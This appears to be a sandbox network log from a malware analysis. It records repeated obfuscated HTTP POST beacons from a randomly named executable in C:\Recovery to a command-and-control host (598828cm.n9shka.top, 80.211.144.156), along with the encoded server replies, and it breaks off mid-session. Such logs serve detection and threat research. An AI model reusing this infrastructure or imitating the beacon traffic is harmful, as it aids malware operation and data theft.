                                                    Sep 14, 2024 12:53:08.681015968 CEST1012OUTData Raw: 56 56 59 59 54 40 5a 5b 5e 5e 56 51 56 58 54 5d 57 51 5c 59 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VVYYT@Z[^^VQVXT]WQ\YW_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+,&-:#7+(."^"0\3Y2<(*01\* 3:/,&F/%Z-%
                                                    Sep 14, 2024 12:53:09.009130001 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:09.140309095 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.46276880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:10.178189039 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:10.524940968 CEST1012OUTData Raw: 53 57 59 59 51 43 5a 5a 5e 5e 56 51 56 5c 54 5c 57 50 5c 5e 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWYYQCZZ^^VQV\T\WP\^W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<:0>%"4$[>*]"Y4X$8_1:(9W&9=X##2,&F/%Z-
                                                    Sep 14, 2024 12:53:10.862967014 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:11.060072899 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.46276980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:13.677700996 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1744
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:14.024821997 CEST1744OUTData Raw: 56 53 59 5d 54 45 5a 5e 5e 5e 56 51 56 58 54 58 57 5f 5c 5a 57 50 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSY]TEZ^^^VQVXTXW_\ZWPUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?,&-&R!'?=>]5?%88_&*<+_/&9X76,&F/%Z-%
                                                    Sep 14, 2024 12:53:14.359977961 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:14.492069960 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 1a 3e 27 3c 58 37 03 2b 0c 3f 2c 35 06 3e 31 36 1b 3e 3f 2f 5a 3e 24 3d 11 3e 3e 33 53 30 02 37 05 27 1f 07 5f 25 24 3f 56 36 3b 2e 5a 0c 1d 23 10 23 23 2e 5a 25 38 36 5b 27 32 2e 17 20 32 23 59 31 15 2d 5a 35 11 2e 5a 3f 28 1b 53 3d 1f 36 0c 28 2d 0c 40 38 03 32 50 34 28 23 51 00 10 25 0a 32 3d 29 13 22 34 36 0e 3e 31 3a 03 31 1b 29 0e 33 3b 2d 03 31 06 2d 5c 25 33 2f 10 20 22 0d 5b 33 2f 3f 5f 23 23 0c 0a 2b 14 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #>'<X7+?,5>16>?/Z>$=>>3S07'_%$?V6;.Z###.Z%86['2. 2#Y1-Z5.Z?(S=6(-@82P4(#Q%2=)"46>1:1)3;-1-\%3/ "[3/?_##+#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.46277080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:14.270376921 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:14.618558884 CEST1012OUTData Raw: 56 53 59 54 51 43 5f 5c 5e 5e 56 51 56 5c 54 58 57 54 5c 5e 57 5b 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYTQC_\^^VQV\TXWT\^W[U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<)X3"T#7<Z*=>! %;(Y29?[?*3P1:73\,<&F/%Z-


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.46277180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:15.336014986 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:15.681031942 CEST1012OUTData Raw: 56 51 59 5d 51 41 5f 59 5e 5e 56 51 56 5d 54 5d 57 54 5c 5c 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQY]QA_Y^^VQV]T]WT\\W]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&*<"$->"'=."]!+$(X27Z+)#V'*5\ 3=X,&F/%Z-1
                                                    Sep 14, 2024 12:53:16.001389027 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:16.128463030 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.46277380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:16.555443048 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:16.903414011 CEST1012OUTData Raw: 56 53 5c 58 54 42 5f 5e 5e 5e 56 51 56 52 54 5c 57 5e 5c 5b 57 5b 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\XTB_^^^VQVRT\W^\[W[U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<?>'9"=.!#?0+#%97*)4&: =.,&F/%Z-
                                                    Sep 14, 2024 12:53:17.239284992 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:17.372342110 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.46277480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:18.156620979 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1000
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:18.509180069 CEST1000OUTData Raw: 53 52 59 58 54 47 5a 53 5e 5e 56 51 56 5b 54 5b 57 57 5c 59 57 51 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SRYXTGZS^^VQV[T[WW\YWQU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\+/=^3.S!(])[!5<4\3;%)7*)Q29*! &8&F/%Z--
                                                    Sep 14, 2024 12:53:18.840773106 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:18.972451925 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.46277680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:19.499731064 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1744
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:19.853044987 CEST1744OUTData Raw: 56 51 5c 5e 51 43 5a 5b 5e 5e 56 51 56 5e 54 58 57 52 5c 59 57 5e 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQ\^QCZ[^^VQV^TXWR\YW^U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z+5'-="==5?$^81:/^+:+P%*9^##)/&F/%Z-=
                                                    Sep 14, 2024 12:53:20.165491104 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:20.365091085 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 58 3e 24 30 10 23 3a 06 54 2b 3c 32 58 3d 32 0c 15 3d 3c 05 5a 2a 34 29 5b 29 3d 02 0b 24 12 30 5e 24 57 3d 14 24 0e 23 57 22 11 2e 5a 0c 1d 23 58 34 30 3a 1e 32 3b 21 03 24 1f 22 5d 23 31 3b 16 26 05 21 59 35 06 3a 5d 3c 16 32 08 29 21 29 53 2a 13 08 0a 2f 2e 2e 53 37 38 23 51 00 10 26 55 32 58 3d 11 36 0e 39 1e 28 31 26 02 25 0b 29 09 25 3b 21 04 25 5e 3d 58 33 55 3f 1f 22 1c 09 12 27 3c 27 58 23 30 39 56 3c 2e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #X>$0#:T+<2X=2=<Z*4)[)=$0^$W=$#W".Z#X40:2;!$"]#1;&!Y5:]<2)!)S*/..S78#Q&U2X=69(1&%)%;!%^=X3U?"'<'X#09V<.#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.46277780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:21.245578051 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:21.602936983 CEST1008OUTData Raw: 53 54 59 55 51 44 5a 5b 5e 5e 56 51 56 5b 54 52 57 54 5c 54 57 51 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: STYUQDZ[^^VQV[TRWT\TWQU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?)_'>>W5Q#(..!?;'+<2$*)7%*9_4 *.<&F/%Z-
                                                    Sep 14, 2024 12:53:21.913300991 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:22.044972897 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.46277880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:23.928507090 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:24.275871992 CEST1012OUTData Raw: 56 53 5c 5b 54 48 5a 5e 5e 5e 56 51 56 59 54 5a 57 5f 5c 55 57 59 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\[THZ^^^VQVYTZW_\UWYUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<_$X>U5(Z>-6<7'8^%9 ()%*>49],<&F/%Z-!
                                                    Sep 14, 2024 12:53:24.594178915 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:24.724431038 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.46277980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:24.871753931 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:25.227947950 CEST1012OUTData Raw: 53 57 59 59 51 42 5a 59 5e 5e 56 51 56 5d 54 5f 57 5f 5c 5b 57 5f 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWYYQBZY^^VQV]T_W_\[W_UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]<?)0S#$$](>15[$84')/?9S1# "/&F/%Z-1
                                                    Sep 14, 2024 12:53:25.538723946 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:25.674169064 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.46278080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:25.816932917 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:26.172389984 CEST1748OUTData Raw: 53 57 5c 5e 54 40 5a 59 5e 5e 56 51 56 53 54 5f 57 51 5c 5a 57 5b 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SW\^T@ZY^^VQVST_WQ\ZW[U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z<<&3-2R6'0=>="??';72)<<9'&4#68<&F/%Z-
                                                    Sep 14, 2024 12:53:26.508223057 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.46278180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:25.842598915 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:26.196747065 CEST1012OUTData Raw: 56 54 59 5d 51 44 5a 5f 5e 5e 56 51 56 59 54 53 57 51 5c 54 57 5a 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY]QDZ_^^VQVYTSWQ\TWZU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(Z5X'X"V674[>5Y ]$#':^<9$29)46,<&F/%Z-!
                                                    Sep 14, 2024 12:53:26.503853083 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:26.631611109 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.46278280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:27.090694904 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:27.446721077 CEST1012OUTData Raw: 53 54 59 5b 54 47 5a 58 5e 5e 56 51 56 5e 54 5d 57 51 5c 58 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: STY[TGZX^^VQV^T]WQ\XW_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+,)_'*U5$)=\#?8[$&:4+32)79;<&F/%Z-=
                                                    Sep 14, 2024 12:53:27.758785009 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:27.889146090 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.46278380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:28.016199112 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:28.368666887 CEST1012OUTData Raw: 53 57 59 5c 54 44 5a 58 5e 5e 56 51 56 58 54 58 57 52 5c 5a 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
